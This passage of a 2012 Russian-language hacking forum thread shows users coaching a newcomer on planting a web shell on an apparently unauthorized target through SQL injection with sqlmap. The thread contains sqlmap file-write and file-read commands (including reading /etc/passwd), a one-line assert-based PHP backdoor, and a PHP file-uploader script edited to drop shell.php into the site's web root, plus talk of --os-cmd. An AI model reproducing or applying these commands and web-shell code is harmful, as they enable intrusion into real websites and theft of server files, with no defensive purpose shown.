Старый 01.02.2012, 19:18   #11
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

что вставить в bablal?я просто не знаю <?assert($_REQUEST[bablal]);?> что дальше после этого?
и запрос будет такой? sqlmap -u "http://...?id=" --file-write="<?assert($_REQUEST[blabla]);?>" --file-dest='/tmp/1.txt'
Shadowfolder вне форума   Ответить с цитированием
Старый 01.02.2012, 22:33   #12
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

только /tmp/1.php
и после так — 1.php?blabla=[твой пхп код], ну а тебе заливка полноценного шелла, это через copy(), например

http://forum.antichat.ru/showthread.php?p=2028400#post2028400
прочитаю всю тему, посмотри, там пасаны на опыте все показали и объяснили.
faza02 вне форума   Ответить с цитированием
Старый 02.02.2012, 06:50   #13
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

Не подходит мне это, я мало что могу ручками пока...Вот и прибегнул к sqlmap-у.Значит через Post запрос получится, да?
как его составить?чтобы залить шелл, а то у меня не выходит
или если можно будет наприер залить вот это

Цитата:
<?php
$name = 'my.exe';
if(file_exists($name))
echo "<a href=$name>$name</a>";
else{
if($_POST['upload']){
if($_FILES['file']['size']){
if(substr($_FILES['file']['name'], -3) == 'exe'){
if(move_uploaded_file($_FILES['file']['tmp_name'], getcwd().'/'.$name))
echo 'ok';
else
echo 'Upload filed: error number '.$_FILES['file']['error'];
}
}

}else{
?><form enctype="multipart/form-data" action="" method="post"><input name="file" type="file" />
<input type="submit" name="upload" value="Upload" />
</form><?php
}
}
?>
если все выйдет подравьте его для php, чтобы я смог загрузить тот шелл
Shadowfolder вне форума   Ответить с цитированием
Старый 03.02.2012, 03:29   #14
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

скрипт гринбира? я его тоже юзал когда-то.
my.exe замени на shell.php например, и строку
Цитата:
if(substr($_FILES['file']['name'], -3) == 'exe'){
на
Цитата:
if(substr($_FILES['file']['name'], -3) == 'php'){
ну а залить, я думаю проще то, что тебе сказали, и вообще, file_priv там Y?
дай ссылку в лс.
faza02 вне форума   Ответить с цитированием
Старый 03.02.2012, 18:42   #15
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
скрипт гринбира? я его тоже юзал когда-то.
my.exe замени на shell.php например, и строку
на

ну а залить, я думаю проще то, что тебе сказали, и вообще, file_priv там Y?
дай ссылку в лс.
они показали ведь ручным способ, а мне надо через sqlmap)если подскажите команды sqlmap поточнее как мне залить шелл, буду очень рад!
file_priv Y?всмысле читалка ли есть?да.могу прочитать файл etc/passwd команда sqlmap -u "http://...?id=" --file-read="/etc/passwd" работает.

что насчет скрипта гринбера
так правильно будет?

<?php
$name = 'shell.php';
if(file_exists($name))
echo "<a href=$name>$name</a>";
else{
if($_POST['upload']){
if($_FILES['file']['size']){
if(substr($_FILES['file']['name'], -3) == 'php'){
if(move_uploaded_file($_FILES['file']['tmp_name'], getcwd().'/'.$name))
echo 'ok';
else
echo 'Upload filed: error number '.$_FILES['file']['error'];
}
}

}else{
?><form enctype="multipart/form-data" action="" method="post"><input name="file" type="file" />
<input type="submit" name="upload" value="Upload" />
</form><?php
}
}
?>
будет заливка в папку /srv/www/htdocs/com/shell.php
когда я загружу скрипт гринбера там будет загрузчик файлов, что мне повзолит загрузить шелл и он будет доступен по адрессы сайт.ком/шелл.php?
Shadowfolder вне форума   Ответить с цитированием
Старый 03.02.2012, 23:00   #16
madnet
 
Аватар для madnet
 
Регистрация: 21.09.2010
Сообщений: 5
Репутация: 1
По умолчанию

Если
/srv/www/htdocs/com/
корневая папка куда ты загружаешь скрипт гринбира и сам сайт доступен из этой директории, то да
madnet вне форума   Ответить с цитированием
Старый 04.02.2012, 06:03   #17
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

(( у меня похоже нету прав, выдаёт [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
а что насчет других команд вроде --os-cmd= ?как через них залить шелл
Shadowfolder вне форума   Ответить с цитированием
Старый 04.02.2012, 10:35   #18
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

мб МК вкл?(
snake вне форума   Ответить с цитированием
Старый 04.02.2012, 12:53   #19
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

мк? хм
Shadowfolder вне форума   Ответить с цитированием
Старый 04.02.2012, 13:04   #20
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

а когда в /tmp/ заливаешь,такой ошибки нет?И файл потом читается через ридфайл?
snake вне форума   Ответить с цитированием
Ответ

Метки
sqlmap для новичков, sqlmap shell

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot